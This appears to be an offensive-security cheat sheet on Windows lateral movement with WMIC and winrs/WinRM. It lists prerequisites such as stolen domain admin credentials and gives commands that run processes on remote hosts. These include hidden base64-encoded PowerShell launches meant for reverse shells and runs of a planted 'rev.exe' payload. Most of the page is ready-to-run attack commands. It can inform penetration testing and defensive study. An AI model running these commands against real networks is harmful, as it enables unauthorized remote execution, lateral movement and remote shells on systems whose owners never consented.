Skip to main content

💥 Wmi & Winrm

Wmic

🧠 What’s the Deal?

WMIC (Windows Management Instrumentation Command-line) is a built-in tool in Windows that lets administrators (or attackers) interact with WMI. Attackers abuse it for lateral movement without dropping extra files (living-off-the-land).

The attacker uses WMIC to remotely execute a process on another machine in the network.

🧰 Gear Up (Prereqs)

There are certain requirements for this attack to work

  • Credentials of a domain user (member of local Administrators group)
  • Network connectivity to target over TCP 135 (RPC) and TCP 445 (SMB)
  • Remote WMI & DCOM access allowed (often open in AD).
  • transfer wmic tool in the windows machine .

Quick checks before Exploitation

before diving into exploitation it's better to check if you can execute command or not

Checking WMI

wmic /node:TARGET_IP /user:DOMAIN\User /password:Pass123 os get caption

OR PowerShell Command

Get-WmiObject -Class Win32_OperatingSystem -ComputerName TARGET -Credential DOMAIN\User

Checking WINRM

winrs -r:TARGET_IP -u:DOMAIN\User -p:Pass123 ipconfig

OR PowerShell command

Enter-PSSession -ComputerName TARGET -Credential DOMAIN\User

🚀 Launch Sequence (How-To)

Use below commands to create new process and execute commands

Using wmic tool

  1. To execute commands
wmic /node:TARGET_IP /user:DOMAIN\user /password:Pass123 process call create "cmd.exe /c whoami"
  • /node: → target system
  • /user: and /password: → credentials
  • process call create → creates a process remotely
  • This runs whoami on the target and returns results.
  1. To get reverse shell using powershell
wmic /node:TARGET process call create "powershell -enc <base64_payload>"
  1. To execute binaries on the remote machine
wmic /node:TARGET_IP process call create "C:\Users\Public\rev.exe"

Using winrs tool

It’s like WMIC, but instead of WMI/DCOM, it uses WinRM (Windows Remote Management) over HTTP/HTTPS (ports 5985 / 5986).

PreReq

  • Valid credentials (domain/local user).
  • Target machine must have WinRM enabled (default on servers, often disabled on workstations).
  • User must be allowed in the “Remote Management Users” group or be an administrator on the target.

Commands

  1. Executing commands
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "ipconfig /all"
  • -r: → target host (IP or hostname).
  • -u: and -p: → credentials.
  • The quoted part is the command executed remotely.
  1. Executing binaries (like reverse shell)
winrs -r:TARGET_IP "C:\Users\Public\rev.exe"
  1. Run powershell commands (for reverse shell)
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "powershell -nop -w hidden -e <base_64_enc_PS_Command>"